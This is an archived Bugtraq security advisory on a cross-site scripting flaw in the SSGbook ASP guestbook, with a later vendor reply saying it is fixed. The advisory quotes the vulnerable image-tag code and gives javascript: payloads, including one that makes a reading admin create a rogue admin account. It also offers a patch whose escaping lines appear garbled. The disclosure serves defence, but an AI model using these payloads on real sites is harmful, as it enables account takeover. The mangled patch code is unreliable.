Bugtraq mailing list archives
Re: SSGbook (ASP)
From: Terry Bankert <tbankert () script-shed com>
Date: 1 Oct 2003 21:11:44 -0000
In-Reply-To: <F127ak1HTJcwXAtPyFC00019ee5 () hotmail com> This issue has been fixed
Received: (qmail 27350 invoked from network); 8 Oct 2002 17:28:07 -0000
Received: from outgoing2.securityfocus.com (HELO outgoing.securityfocus.com) (205.206.231.26)
by mail.securityfocus.com with SMTP; 8 Oct 2002 17:28:07 -0000
Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19])
by outgoing.securityfocus.com (Postfix) with QMQP
id D0E078F2A1; Tue, 8 Oct 2002 10:36:42 -0600 (MDT)
Mailing-List: contact bugtraq-help () securityfocus com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq () securityfocus com>
List-Help: <mailto:bugtraq-help () securityfocus com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe () securityfocus com>
List-Subscribe: <mailto:bugtraq-subscribe () securityfocus com>
Delivered-To: mailing list bugtraq () securityfocus com
Delivered-To: moderator for bugtraq () securityfocus com
Received: (qmail 25496 invoked from network); 8 Oct 2002 17:08:44 -0000
X-Originating-IP: [80.236.134.100]
From: "Frog Man" <leseulfrog () hotmail com>
To: bugtraq () securityfocus com
Subject: SSGbook (ASP)
Date: Tue, 08 Oct 2002 19:31:54 +0200
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F127ak1HTJcwXAtPyFC00019ee5 () hotmail com>
X-OriginalArrivalTime: 08 Oct 2002 17:31:54.0466 (UTC) FILETIME=[9835BC20:01C26EF0]
Informations :
°°°°°°°°°°°°°°
Product : SSGbook
Langage : ASP
Tested version : 1
Website : http://www.script-shed.com
Problem : Cross Site Scripting
PHP Code / location :
°°°°°°°°°°°°°°°°°°°°°
----------------- config.asp ----------------------
fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>")
fString = doCode(fString, "[img=right]","[/img=right]","<img align=right
src=""",""" id=right border=0>")
fString = doCode(fString, "[image=right]","[/image=right]","<img align=right
src=""",""" id=right border=0>")
fString = doCode(fString, "[img=left]","[/img=left]","<img align=left
src=""",""" id=left border=0>")
fString = doCode(fString, "[image=left]","[/image=left]","<img align=left
src=""",""" id=left border=0>")
----------------- config.asp ----------------------
Exploit :
°°°°°°°°°
[image]javascript:{SCRIPT}[/image]
[img=right]javascript:{SCRIPT}[/img=right]
[image=right]javascript:{SCRIPT}[/image=right]
[img=left]javascript:{SCRIPT}[/img=left]
[image=left]javascript:{SCRIPT}[/image=left]
[img]javascript:{SCRIPT}[/img]
e.g. :
[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image]
Add an admin if an admin read it. Login : Pom, Password : turlututu
Patch :
°°°°°°°
In config.asp :
Add this line :
strOutput = Replace(strOutput, chr(34), """)
after
----------------------------------------------
strOutput = Replace(strOutput, "<", "<")
strOutput = Replace(strOutput, ">", ">")
----------------------------------------------
And replace this lines :
------------------------------------------------
fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
fString = doCode(fString, "[image]","[/image]","<img src=""","""
border=0>")
fString = doCode(fString, "[img=right]","[/img=right]","<img align=right
src=""",""" id=right border=0>")
fString = doCode(fString, "[image=right]","[/image=right]","<img
align=right src=""",""" id=right border=0>")
fString = doCode(fString, "[img=left]","[/img=left]","<img align=left
src=""",""" id=left border=0>")
fString = doCode(fString, "[image=left]","[/image=left]","<img align=left
src=""",""" id=left border=0>")
------------------------------------------------
by :
------------------------------------------------
fString = doCode(fString, "[img]http://","[/img]",";<img src=""http://",""";
border=0>")
fString = doCode(fString, "[image]http://","[/image]",";<img
src=""http://","""; border=0>")
fString = doCode(fString, "[img=right]http://","[/img=right]",";<img
align=right src=""http://","""; id=right border=0>")
fString = doCode(fString, "[image=right]http://","[/image=right]",";<img
align=right src=""http://","""; id=right border=0>")
fString = doCode(fString, "[img=left]http://","[/img=left]",";<img
align=left src=""http://","""; id=left border=0>")
fString = doCode(fString, "[image=left]http://","[/image=left]",";<img
align=left src=""http://","""; id=left border=0>")
------------------------------------------------
More details in french :
http://www.frog-man.org/tutos/SSGbook.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSSGbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
_________________________________________________________________
Discutez en ligne avec vos amis ! http://messenger.msn.fr
Current thread:
- Re: SSGbook (ASP) Terry Bankert (Oct 01)